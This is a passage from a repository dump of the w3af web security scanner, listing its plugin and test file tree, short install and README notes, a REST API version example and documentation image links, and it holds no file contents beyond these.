│ │ └── xpath.py │ ├── audit │ │ ├── __init__.py │ │ ├── blind_sqli.py │ │ ├── buffer_overflow.py │ │ ├── cors_origin.py │ │ ├── csrf.py │ │ ├── dav.py │ │ ├── deserialization.py │ │ ├── deserialization │ │ │ ├── java │ │ │ │ ├── BeanShell1.json │ │ │ │ ├── Clojure.json │ │ │ │ ├── CommonsBeanutils1.json │ │ │ │ ├── CommonsCollections1.json │ │ │ │ ├── CommonsCollections2.json │ │ │ │ ├── CommonsCollections3.json │ │ │ │ ├── CommonsCollections4.json │ │ │ │ ├── CommonsCollections5.json │ │ │ │ ├── CommonsCollections6.json │ │ │ │ ├── Groovy1.json │ │ │ │ ├── Hibernate1.json │ │ │ │ ├── Hibernate2.json │ │ │ │ ├── JBossInterceptors1.json │ │ │ │ ├── JRMPClient.json │ │ │ │ ├── JSON1.json │ │ │ │ ├── JavassistWeld1.json │ │ │ │ ├── Jdk7u21.json │ │ │ │ ├── MozillaRhino1.json │ │ │ │ ├── Myfaces1.json │ │ │ │ ├── README.md │ │ │ │ ├── ROME.json │ │ │ │ ├── Spring1.json │ │ │ │ ├── Spring2.json │ │ │ │ ├── generator.py │ │ │ │ └── send-payload.sh │ │ │ ├── net │ │ │ │ ├── ObjectDataProvider-FastJson.json │ │ │ │ ├── ObjectDataProvider-JavaScriptSerializer.json │ │ │ │ ├── README.md │ │ │ │ └── generator.py │ │ │ ├── node │ │ │ │ ├── README.md │ │ │ │ ├── node-serialize.json │ │ │ │ ├── package-lock.json │ │ │ │ ├── payload-generator.js │ │ │ │ ├── payload-sleep-generator.js │ │ │ │ └── test-server.js │ │ │ └── python │ │ │ │ ├── README.md │ │ │ │ ├── generator.py │ │ │ │ └── pickle.json │ │ ├── eval.py │ │ ├── file_upload.py │ │ ├── format_string.py │ │ ├── frontpage.py │ │ ├── generic.py │ │ ├── global_redirect.py │ │ ├── htaccess_methods.py │ │ ├── ldapi.py │ │ ├── lfi.py │ │ ├── memcachei.py │ │ ├── mx_injection.py │ │ ├── os_commanding.py │ │ ├── phishing_vector.py │ │ ├── preg_replace.py │ │ ├── redos.py │ │ ├── response_splitting.py │ │ ├── rfd.py │ │ ├── rfi.py │ │ ├── rosetta_flash.py │ │ ├── shell_shock.py │ │ ├── sqli.py │ │ ├── ssi.py │ │ ├── ssl_certificate.py │ │ ├── ssl_certificate │ │ │ └── ca.pem │ │ ├── un_ssl.py │ │ ├── websocket_hijacking.py │ │ ├── xpath.py │ │ ├── xss.py │ │ ├── xst.py │ │ └── xxe.py │ ├── auth │ │ ├── __init__.py │ │ ├── autocomplete.py │ │ ├── detailed.py │ │ └── generic.py │ ├── bruteforce │ │ ├── __init__.py │ │ ├── basic_auth.py │ │ └── form_auth.py │ ├── crawl │ │ ├── __init__.py │ │ ├── archive_dot_org.py │ │ ├── bing_spider.py │ │ ├── content_negotiation.py │ │ ├── content_negotiation │ │ │ └── common_filenames.db │ │ ├── digit_sum.py │ │ ├── dir_file_bruter.py │ │ ├── dir_file_bruter │ │ │ ├── common_dirs_small.db │ │ │ └── common_files_small.db │ │ ├── dot_ds_store.py │ │ ├── dot_listing.py │ │ ├── dwsync_xml.py │ │ ├── find_backdoors.py │ │ ├── find_backdoors │ │ │ ├── signatures.txt │ │ │ └── web_shells.txt │ │ ├── find_captchas.py │ │ ├── find_dvcs.py │ │ ├── genexus_xml.py │ │ ├── ghdb.py │ │ ├── ghdb │ │ │ └── GHDB.xml │ │ ├── google_spider.py │ │ ├── import_results.py │ │ ├── open_api.py │ │ ├── oracle_discovery.py │ │ ├── payment_webhook_finder.py │ │ ├── phishtank.py │ │ ├── phishtank │ │ │ ├── index.csv │ │ │ └── update.py │ │ ├── phpinfo.py │ │ ├── phpinfo_analysis │ │ │ ├── __init__.py │ │ │ └── analysis.py │ │ ├── pykto.py │ │ ├── pykto │ │ │ ├── scan_database.db │ │ │ ├── update_scan_db.py │ │ │ └── w3af_scan_database.db │ │ ├── ria_enumerator.py │ │ ├── ria_enumerator │ │ │ └── common_filenames.db │ │ ├── robots_txt.py │ │ ├── sitemap_xml.py │ │ ├── spider_man.py │ │ ├── spider_man │ │ │ └── favicon.ico │ │ ├── url_fuzzer.py │ │ ├── urllist_txt.py │ │ ├── user_db │ │ │ ├── __init__.py │ │ │ ├── applications.csv │ │ │ ├── os.csv │ │ │ └── user_db.py │ │ ├── user_dir.py │ │ ├── web_diff.py │ │ ├── web_spider.py │ │ ├── wordnet.py │ │ ├── wordnet │ │ │ └── wordnet.zip │ │ ├── wordpress_enumerate_users.py │ │ ├── wordpress_fingerprint.py │ │ ├── wordpress_fingerprint │ │ │ ├── generate_release_db.py │ │ │ ├── release.db │ │ │ └── wp_versions.xml │ │ ├── wordpress_fullpathdisclosure.py │ │ └── wsdl_finder.py │ ├── evasion │ │ ├── __init__.py │ │ ├── backspace_between_dots.py │ │ ├── full_width_encode.py │ │ ├── mod_security.py │ │ ├── reversed_slashes.py │ │ ├── rnd_case.py │ │ ├── rnd_hex_encode.py │ │ ├── rnd_param.py │ │ ├── rnd_path.py │ │ ├── self_reference.py │ │ ├── shift_out_in_between_dots.py │ │ └── x_forwarded_for.py │ ├── grep │ │ ├── __init__.py │ │ ├── analyze_cookies.py │ │ ├── blank_body.py │ │ ├── cache_control.py │ │ ├── cdn_providers.py │ │ ├── clamav.py │ │ ├── click_jacking.py │ │ ├── code_disclosure.py │ │ ├── content_sniffing.py │ │ ├── credit_cards.py │ │ ├── cross_domain_js.py │ │ ├── cross_domain_js │ │ │ └── secure-js-sources.txt │ │ ├── csp.py │ │ ├── directory_indexing.py │ │ ├── dom_xss.py │ │ ├── dot_net_event_validation.py │ │ ├── error_500.py │ │ ├── error_pages.py │ │ ├── expect_ct.py │ │ ├── feeds.py │ │ ├── file_upload.py │ │ ├── form_autocomplete.py │ │ ├── form_cleartext_password.py │ │ ├── get_emails.py │ │ ├── hash_analysis.py │ │ ├── html_comments.py │ │ ├── http_auth_detect.py │ │ ├── http_in_body.py │ │ ├── keys.py │ │ ├── lang.py │ │ ├── meta_generator.py │ │ ├── meta_tags.py │ │ ├── motw.py │ │ ├── objects.py │ │ ├── oracle.py │ │ ├── password_profiling.py │ │ ├── password_profiling_plugins │ │ │ ├── __init__.py │ │ │ ├── base_plugin.py │ │ │ ├── html.py │ │ │ ├── pdf.py │ │ │ └── tests │ │ │ │ ├── test.pdf │ │ │ │ └── test_pdf.py │ │ ├── path_disclosure.py │ │ ├── private_ip.py │ │ ├── retirejs.py │ │ ├── serialized_object.py │ │ ├── ssn.py │ │ ├── ssndata │ │ │ ├── __init__.py │ │ │ └── ssnAreasGroups.py │ │ ├── strange_headers.py │ │ ├── strange_http_codes.py │ │ ├── strange_parameters.py │ │ ├── strange_reason.py │ │ ├── strict_transport_security.py │ │ ├── svn_users.py │ │ ├── symfony.py │ │ ├── url_session.py │ │ ├── user_defined_regex.py │ │ ├── user_defined_regex │ │ │ ├── README.txt │ │ │ ├── empty.txt │ │ │ ├── example_regexes.txt │ │ │ └── fuzzdb_pii.txt │ │ ├── vulners_db.py │ │ ├── websockets_links.py │ │ ├── wsdl_greper.py │ │ └── xss_protection_header.py │ ├── infrastructure │ │ ├── __init__.py │ │ ├── afd.py │ │ ├── allowed_methods.py │ │ ├── detect_reverse_proxy.py │ │ ├── detect_transparent_proxy.py │ │ ├── dns_wildcard.py │ │ ├── domain_dot.py │ │ ├── dot_net_errors.py │ │ ├── favicon │ │ │ └── favicon-md5 │ │ ├── favicon_identification.py │ │ ├── find_jboss.py │ │ ├── find_vhosts.py │ │ ├── finger_bing.py │ │ ├── finger_google.py │ │ ├── finger_pks.py │ │ ├── fingerprint_WAF.py │ │ ├── fingerprint_os.py │ │ ├── frontpage_version.py │ │ ├── halberd.py │ │ ├── halberd_helpers │ │ │ ├── __init__.py │ │ │ └── strategy.py │ │ ├── hmap.py │ │ ├── http_vs_https_dist.py │ │ ├── jetleak.py │ │ ├── ms15_034.py │ │ ├── oHmap │ │ │ ├── BUGS │ │ │ ├── FAQS │ │ │ ├── GPL │ │ │ ├── HIDING_GUIDE │ │ │ ├── KNOWN_TESTS │ │ │ ├── README │ │ │ ├── __init__.py │ │ │ ├── hmap.py │ │ │ └── known.servers │ │ │ │ ├── GeoHttpServer │ │ │ │ ├── WSGIServer-0.1-Python-2.7.3 │ │ │ │ ├── apache-1.3.27-modperl-1.27-unix │ │ │ │ ├── apache-1.3.29-freebsd │ │ │ │ ├── apache-1.3.33-macos │ │ │ │ ├── apache-1.3.33-solaris │ │ │ │ ├── apache-1.3.36-freebsd │ │ │ │ ├── apache-1.3.41-F5-big-IP │ │ │ │ ├── apache-1.3.41-freebsd │ │ │ │ ├── apache-1.3.41-linux │ │ │ │ ├── apache-1.3.9-php-3.0.11-freebsd │ │ │ │ ├── apache-2.2.3 │ │ │ │ ├── apache-2.2.3-redhat │ │ │ │ ├── apache-2.2.8-Fedora │ │ │ │ ├── apache-2.2.8-linux │ │ │ │ ├── apache-2.2.8-ubuntu │ │ │ │ ├── apache-2.2.9-debian │ │ │ │ ├── apache.1.3.12.win32 │ │ │ │ ├── apache.1.3.14.win32 │ │ │ │ ├── apache.1.3.17.win32 │ │ │ │ ├── apache.1.3.22.win32 │ │ │ │ ├── apache.1.3.23.rhl.7.3 │ │ │ │ ├── apache.1.3.26.freebsd.4.6.2.r │ │ │ │ ├── apache.1.3.26.solaris.8 │ │ │ │ ├── apache.1.3.27.freebsd.4.7 │ │ │ │ ├── apache.1.3.27.freebsd.5.0 │ │ │ │ ├── apache.1.3.27.mac.10.1.5 │ │ │ │ ├── apache.1.3.27.mac.10.2.4 │ │ │ │ ├── apache.1.3.27.rhl.8.0 │ │ │ │ ├── apache.1.3.31 │ │ │ │ ├── apache.1.3.33.win32 │ │ │ │ ├── apache.1.3.34.benssl.1.55.ubuntu │ │ │ │ ├── apache.1.3.39.sunOne │ │ │ │ ├── apache.1.3.39.unix │ │ │ │ ├── apache.1.3.9.win32 │ │ │ │ ├── apache.2.0.40.rhl.8.0 │ │ │ │ ├── apache.2.0.44.win32 │ │ │ │ ├── apache.2.0.52.unix │ │ │ │ ├── apache.2.0.55.ubuntu │ │ │ │ ├── apache.2.2.6.debian │ │ │ │ ├── apache.2.2.8-ubuntu │ │ │ │ ├── apache.2.2.8.unix │ │ │ │ ├── apache.2.2.9.win32 │ │ │ │ ├── apache.2.2.9.win32.xampp │ │ │ │ ├── apache.2.2.unix │ │ │ │ ├── apache.coyote.1.1 │ │ │ │ ├── badblue.2.1.win32 │ │ │ │ ├── dwhttpd.4.1a6.solaris.8 │ │ │ │ ├── gfe-1.3 │ │ │ │ ├── hpws.2.00.1454.solaris.8 │ │ │ │ ├── ibm_http_server.2.0.42.win32 │ │ │ │ ├── iis-4.0.pws.win32 │ │ │ │ ├── iis-5.0 │ │ │ │ ├── iis-5.1-es │ │ │ │ ├── iis-6.0_asp_2.0.50727 │ │ │ │ ├── iis-7.0 │ │ │ │ ├── iis-7.0_asp_2.0.50727 │ │ │ │ ├── iis.5.0.win32 │ │ │ │ ├── iis.6.0.win32 │ │ │ │ ├── intoto-http-server-v1.0 │ │ │ │ ├── jigsaw.2.0.5.win32 │ │ │ │ ├── jigsaw.2.2.0.win32 │ │ │ │ ├── jigsaw.2.2.2.solaris.8 │ │ │ │ ├── lighthttpd-1.5.0-linux │ │ │ │ ├── mbedthis-appweb-2.4.0.juniper-srx100 │ │ │ │ ├── ncsa.1.3.ultrix.4.4 │ │ │ │ ├── nginx-linux │ │ │ │ ├── oracle_application_server_10g_9.0.4.0.0 │ │ │ │ ├── oversee-1.3.18 │ │ │ │ ├── rapidsite-apa-irix │ │ │ │ ├── thttpd.2.23beta1.freebsd.4.6.st │ │ │ │ ├── thttpd.2.23beta1.rhl.7.3 │ │ │ │ ├── webrick.1.3.1.unix │ │ │ │ ├── webrick.1.3.1.windows │ │ │ │ ├── zeus-4.3_php-5.1.4 │ │ │ │ └── zope.2.6.0.solaris.8 │ │ ├── php_eggs.py │ │ ├── php_eggs │ │ │ └── eggs.json │ │ ├── server_header.py │ │ ├── server_status.py │ │ ├── shared_hosting.py │ │ ├── werkzeug_debugger.py │ │ ├── xssed_dot_com.py │ │ └── zone_h.py │ ├── mangle │ │ ├── __init__.py │ │ └── sed.py │ ├── output │ │ ├── __init__.py │ │ ├── console.py │ │ ├── csv_file.py │ │ ├── email_report.py │ │ ├── export_requests.py │ │ ├── html_file.py │ │ ├── html_file │ │ │ └── templates │ │ │ │ ├── bootstrap-3.3.2.min.css │ │ │ │ ├── complete.html │ │ │ │ ├── high.png │ │ │ │ ├── information.png │ │ │ │ ├── low.png │ │ │ │ └── medium.png │ │ ├── json_file.py │ │ ├── system_log.py │ │ ├── text_file.py │ │ ├── xml_file.py │ │ └── xml_file │ │ │ ├── finding.tpl │ │ │ ├── http_transaction.tpl │ │ │ ├── report.xsd │ │ │ ├── root.tpl │ │ │ ├── scan_info.tpl │ │ │ └── scan_status.tpl │ └── tests │ │ ├── __init__.py │ │ ├── attack │ │ ├── __init__.py │ │ ├── test_dav.py │ │ ├── test_eval.py │ │ ├── test_file_upload.py │ │ ├── test_local_file_reader.py │ │ ├── test_os_commanding.py │ │ ├── test_rfi.py │ │ ├── test_sqlmap.py │ │ └── test_xpath.py │ │ ├── audit │ │ ├── __init__.py │ │ ├── certs │ │ │ ├── README │ │ │ └── invalid_cert.pem │ │ ├── test_all_false_positive.py │ │ ├── test_blind_sqli.py │ │ ├── test_buffer_overflow.py │ │ ├── test_cors_origin.py │ │ ├── test_csrf.py │ │ ├── test_dav.py │ │ ├── test_deserialization.py │ │ ├── test_eval.py │ │ ├── test_file_upload.py │ │ ├── test_format_string.py │ │ ├── test_frontpage.py │ │ ├── test_generic.py │ │ ├── test_global_redirect.py │ │ ├── test_htaccess_methods.py │ │ ├── test_ldapi.py │ │ ├── test_lfi.py │ │ ├── test_memcachei.py │ │ ├── test_mx_injection.py │ │ ├── test_os_commanding.py │ │ ├── test_phishing_vector.py │ │ ├── test_preg_replace.py │ │ ├── test_redos.py │ │ ├── test_response_splitting.py │ │ ├── test_rfd.py │ │ ├── test_rfi.py │ │ ├── test_rosetta_flash.py │ │ ├── test_shell_shock.py │ │ ├── test_sqli.py │ │ ├── test_ssi.py │ │ ├── test_ssl_certificate.py │ │ ├── test_un_ssl.py │ │ ├── test_websocket_hijacking.py │ │ ├── test_xpath.py │ │ ├── test_xss.py │ │ ├── test_xst.py │ │ └── test_xxe.py │ │ ├── auth │ │ ├── __init__.py │ │ ├── test_autocomplete.py │ │ ├── test_detailed.py │ │ └── test_generic.py │ │ ├── bruteforce │ │ ├── __init__.py │ │ ├── small-passwords.txt │ │ ├── small-users-negative.txt │ │ ├── small-users-positive.txt │ │ ├── test_basic_auth.py │ │ └── test_form_auth.py │ │ ├── constants │ │ ├── __init__.py │ │ └── http_responses.py │ │ ├── crawl │ │ ├── __init__.py │ │ ├── dir_file_bruter │ │ │ ├── test_dirs_small.db │ │ │ └── test_files_small.db │ │ ├── dot_listing │ │ │ ├── listing_test_1.txt │ │ │ ├── listing_test_2.txt │ │ │ └── listing_test_3.txt │ │ ├── ds_store │ │ │ └── DS_Store │ │ ├── failing_spider.py │ │ ├── find_dvcs │ │ │ └── sample-wc.db │ │ ├── import_results │ │ │ ├── burp-base64.xml │ │ │ ├── burp-no-base64.xml │ │ │ └── w3af.base64 │ │ ├── phishtank │ │ │ ├── __init__.py │ │ │ └── test_phishtank_xml_parsing.py │ │ ├── phpinfo │ │ │ ├── phpinfo-4.3.11.html │ │ │ ├── phpinfo-4.3.3.html │ │ │ ├── phpinfo-5.1.3-rc4dev.html │ │ │ └── phpinfo-5.1.6.html │ │ ├── pykto │ │ │ └── scan_database.db │ │ ├── test_archive_dot_org.py │ │ ├── test_bing_spider.py │ │ ├── test_content_negotiation.py │ │ ├── test_crawl_exception_handling.py │ │ ├── test_digit_sum.py │ │ ├── test_dir_file_bruter.py │ │ ├── test_dot_ds_store.py │ │ ├── test_dot_listing.py │ │ ├── test_dwsync_xml.py │ │ ├── test_find_backdoors.py │ │ ├── test_find_captchas.py │ │ ├── test_find_dvcs.py │ │ ├── test_genexus_xml.py │ │ ├── test_ghdb.py │ │ ├── test_google_spider.py │ │ ├── test_import_results.py │ │ ├── test_open_api.py │ │ ├── test_oracle_discovery.py │ │ ├── test_payment_webhook_finder.py │ │ ├── test_phishtank.py │ │ ├── test_phpinfo.py │ │ ├── test_pykto.py │ │ ├── test_ria_enumerator.py │ │ ├── test_robots_txt.py │ │ ├── test_sitemap_xml.py │ │ ├── test_spider_man.py │ │ ├── test_url_fuzzer.py │ │ ├── test_urllist_txt.py │ │ ├── test_user_dir.py │ │ ├── test_web_diff.py │ │ ├── test_web_spider.py │ │ ├── test_wordnet.py │ │ ├── test_wordpress_enumerate_users.py │ │ ├── test_wordpress_fingerprint.py │ │ ├── test_wordpress_fullpathdisclosure.py │ │ ├── test_wsdl_finder.py │ │ ├── web_diff │ │ │ ├── 123.html │ │ │ ├── 456.html │ │ │ ├── exclude.php │ │ │ └── index.html │ │ └── web_spider │ │ │ └── 5834 │ │ │ ├── galeria-assets-ico.html │ │ │ ├── galeria-assets.html │ │ │ ├── galeria-root.html │ │ │ └── index.html │ │ ├── evasion │ │ ├── __init__.py │ │ ├── test_backspace_between_dots.py │ │ ├── test_core_integration.py │ │ ├── test_full_width_encode.py │ │ ├── test_mod_security.py │ │ ├── test_reversed_slashes.py │ │ ├── test_rnd_case.py │ │ ├── test_rnd_hex_encode.py │ │ ├── test_rnd_param.py │ │ ├── test_rnd_path.py │ │ ├── test_self_reference.py │ │ ├── test_shift_out_in_between_dots.py │ │ ├── test_x_forwarded_for.py │ │ └── test_xurllib_integration.py │ │ ├── grep │ │ ├── __init__.py │ │ ├── data │ │ │ ├── test-1.html │ │ │ ├── test-2.html │ │ │ ├── test-3.html │ │ │ ├── test-4.html │ │ │ ├── test-5.html │ │ │ └── w3af.png │ │ ├── retirejs │ │ │ └── jquery.js │ │ ├── test_all.py │ │ ├── test_analyze_cookies.py │ │ ├── test_blank_body.py │ │ ├── test_cache_control.py │ │ ├── test_cdn_providers.py │ │ ├── test_clamav.py │ │ ├── test_click_jacking.py │ │ ├── test_code_disclosure.py │ │ ├── test_content_sniffing.py │ │ ├── test_credit_cards.py │ │ ├── test_cross_domain_js.py │ │ ├── test_csp.py │ │ ├── test_directory_indexing.py │ │ ├── test_dom_xss.py │ │ ├── test_dot_net_event_validation.py │ │ ├── test_error_500.py │ │ ├── test_error_pages.py │ │ ├── test_expect_ct.py │ │ ├── test_feeds.py │ │ ├── test_file_upload.py │ │ ├── test_form_autocomplete.py │ │ ├── test_form_cleartext_password.py │ │ ├── test_get_emails.py │ │ ├── test_hash_analysis.py │ │ ├── test_html_comments.py │ │ ├── test_http_auth_detect.py │ │ ├── test_http_in_body.py │ │ ├── test_keys.py │ │ ├── test_lang.py │ │ ├── test_meta_generator.py │ │ ├── test_meta_tags.py │ │ ├── test_motw.py │ │ ├── test_objects.py │ │ ├── test_oracle.py │ │ ├── test_password_profiling.py │ │ ├── test_path_disclosure.py │ │ ├── test_private_ip.py │ │ ├── test_retirejs.py │ │ ├── test_serialized_object.py │ │ ├── test_ssn.py │ │ ├── test_strange_headers.py │ │ ├── test_strange_http_codes.py │ │ ├── test_strange_parameters.py │ │ ├── test_strange_reason.py │ │ ├── test_strict_transport_security.py │ │ ├── test_svn_users.py │ │ ├── test_symfony.py │ │ ├── test_url_session.py │ │ ├── test_user_defined_regex.py │ │ ├── test_vulners_db.py │ │ ├── test_websockets_links.py │ │ ├── test_wsdl_greper.py │ │ └── test_xss_protection_header.py │ │ ├── helper.py │ │ ├── infrastructure │ │ ├── __init__.py │ │ ├── test_afd.py │ │ ├── test_allowed_methods.py │ │ ├── test_detect_reverse_proxy.py │ │ ├── test_detect_transparent_proxy.py │ │ ├── test_dns_wildcard.py │ │ ├── test_domain_dot.py │ │ ├── test_dot_net_errors.py │ │ ├── test_favicon_identification.py │ │ ├── test_find_jboss.py │ │ ├── test_find_vhosts.py │ │ ├── test_finger_bing.py │ │ ├── test_finger_google.py │ │ ├── test_finger_pks.py │ │ ├── test_fingerprint_WAF.py │ │ ├── test_fingerprint_os.py │ │ ├── test_frontpage_version.py │ │ ├── test_halberd.py │ │ ├── test_hmap.py │ │ ├── test_http_vs_https_dist.py │ │ ├── test_jetleak.py │ │ ├── test_ms15_034.py │ │ ├── test_php_eggs.py │ │ ├── test_server_header.py │ │ ├── test_server_status.py │ │ ├── test_shared_hosting.py │ │ ├── test_werkzeug_debugger.py │ │ ├── test_xssed_dot_com.py │ │ └── test_zone_h.py │ │ ├── mangle │ │ ├── __init__.py │ │ └── test_sed.py │ │ ├── output │ │ ├── __init__.py │ │ ├── data │ │ │ ├── 0x0b.html │ │ │ └── nsepa32.rpm │ │ ├── test_console.py │ │ ├── test_csv_file.py │ │ ├── test_email_report.py │ │ ├── test_export_requests.py │ │ ├── test_html_file.py │ │ ├── test_json_file.py │ │ ├── test_text_file.py │ │ └── test_xml_file.py │ │ ├── test_basic.py │ │ ├── test_no_debug_unittest.py │ │ └── test_unittest_coverage.py └── tests │ ├── __init__.py │ ├── add-test-routes.sh │ ├── build-crawl-test.py │ ├── docker-compose.yml │ ├── extract-responses.py │ ├── helpers │ ├── __init__.py │ └── parse_http_log.py │ ├── requirements.txt │ ├── vuln_sites │ ├── __init__.py │ ├── test_asp_vulnweb_com.py │ ├── test_aspnet_vulnweb_com.py │ ├── test_crackme_cenzic_com.py │ ├── test_demo_testfire_net.py │ ├── test_php_vulnweb_com.py │ ├── test_webscantest_com.py │ ├── test_zero_webappsecurity_com.py │ └── utils │ │ ├── __init__.py │ │ └── scan_vulnerable_site.py │ ├── waitfor-test-dependencies.py │ └── wavsep.yml ├── w3af_api ├── w3af_console └── w3af_gui /doc/INSTALL: -------------------------------------------------------------------------------- 1 | Installation procedure available @ http://docs.w3af.org/ 2 | -------------------------------------------------------------------------------- /doc/README: -------------------------------------------------------------------------------- 1 | Usage and installation 2 | ====================== 3 | 4 | We recommend you to read the user's guide before starting to use w3af, there 5 | are many FAQs, tips and tricks and other important pieces of information in 6 | the manual. 7 | 8 | http://docs.w3af.org/ 9 | 10 | 11 | -------------------------------------------------------------------------------- /doc/sphinx/api/version.rst: -------------------------------------------------------------------------------- 1 | The ``/version`` resource 2 | ========================= 3 | 4 | Query the w3af version using the REST API: 5 | 6 | .. code-block:: none 7 | 8 | $ curl http://127.0.0.1:5000/version 9 | { 10 | "branch": "develop", 11 | "dirty": "Yes", 12 | "revision": "f1cae98161 - 24 Jun 2015 16:29", 13 | "version": "1.7.2" 14 | } 15 | -------------------------------------------------------------------------------- /doc/sphinx/gui/images/cluster.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/cluster.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/compare-tool.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/compare-tool.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/encode-decode.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/encode-decode.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/exploit-all.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/exploit-all.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/exploit.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/exploiting.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/exploiting.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/fuzzy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/fuzzy.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/general-structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/general-structure.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/gui-screenshot-main.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/gui-screenshot-main.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/http-settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/http-settings.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/knowledge-base.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/knowledge-base.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/log-messages.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/log-messages.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/log-tab.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/log-tab.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/manual-http.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/manual-http.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/misc-settings.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/misc-settings.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/multiple-exploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/multiple-exploit.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/new-save.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/new-save.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/pause.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/pause.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/plugin-config.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/plugin-config.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/proxy.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/proxy.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/rr-navigator.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/rr-navigator.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/search-help.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/search-help.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/shell.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/site-structure.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/site-structure.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/start-pause.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/start-pause.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/start-stop-clear.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/start-stop-clear.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/status-bar.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/status-bar.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/status.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/andresriancho/w3af/cd22e5252243a87aaa6d0ddea47cf58dacfe00a9/doc/sphinx/gui/images/status.png -------------------------------------------------------------------------------- /doc/sphinx/gui/images/target-conf.png: -------------------------------------------------------------------------------- 